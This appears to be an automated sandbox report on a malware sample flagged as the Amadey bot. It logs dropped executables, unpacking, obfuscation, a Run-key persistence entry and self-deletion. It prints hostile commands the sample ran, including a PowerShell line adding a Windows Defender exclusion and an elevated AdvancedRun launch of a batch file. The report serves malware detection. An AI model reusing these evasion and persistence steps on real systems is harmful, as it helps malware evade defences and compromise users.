Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 30_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C5EA.tmp Jump to behavior
Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\A557.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A557.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A557.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\152F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\152F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 8615.exe
Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Unpacked PE file: 24.2.8615.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack .text:ER;.data:W;.rulofiv:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_02EC1118 push ds; ret 0_2_02EC1125
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Code function: 23_2_00A7D37C push esi; iretd 23_2_00A7D388
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E54 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E63 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402665 push cs; ret 24_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040290C push eax; iretd 24_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E16 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DC0 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DD8 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DE8 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DF1 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E82 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E85 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402D92 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E95 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401D9A pushad ; ret 24_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E9C push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4CD0D1 push ecx; ret 24_2_6B4CD0E4
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\A557.exe Code function: 29_2_002DCF50 push ss; ret 29_2_002DCF51
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B550 push eax; ret 30_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B550 push eax; ret 30_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B50D push ecx; ret 30_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B61AB1 push ds; retf 33_2_02B61AB9
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B628C4 push esp; iretd 33_2_02B628C5
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B62728 push ds; retf 33_2_02B6272C
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B61614 push edx; iretd 33_2_02B61622
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0040BDAD push eax; retn 0040h 34_2_0040BDC7
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410F16 push ecx; ret 34_2_00410F29
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00427590
Binary contains a suspicious time stamp
Source: 77DC.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: cnv622JnZv.exe Static PE information: section name: .mehepek
Source: 8615.exe.6.dr Static PE information: section name: .cipizi
Source: 2E26.exe.6.dr Static PE information: section name: .MPRESS1
Source: 2E26.exe.6.dr Static PE information: section name: .MPRESS2
Source: B084.exe.6.dr Static PE information: section name: .daya
Source: C5EA.exe.6.dr Static PE information: section name: .lufulac
Source: 152F.exe.6.dr Static PE information: section name: .rulofiv
Source: jejhieg.6.dr Static PE information: section name: .mehepek
Source: bejhieg.6.dr Static PE information: section name: .cipizi
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains an invalid checksum
Source: A557.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 977B.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xdd7bb
Source: 66A4.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: initial sample Static PE information: section name: .text entropy: 7.00461715058
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 7.87137605191
Source: initial sample Static PE information: section name: .text entropy: 6.99265157433
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.66944674948
Source: initial sample Static PE information: section name: .text entropy: 7.00461715058
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306

Persistence and Installation Behavior:

barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bejhieg Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\977B.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bejhieg Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8615.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe File created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2E26.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C5EA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A557.exe File created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A557.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\66A4.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\152F.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8615.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\77DC.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B084.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\977B.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306

Hooking and other Techniques for Hiding and Protection:

barindex
DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\8615.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\cnv622jnzv.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\jejhieg:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 25_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
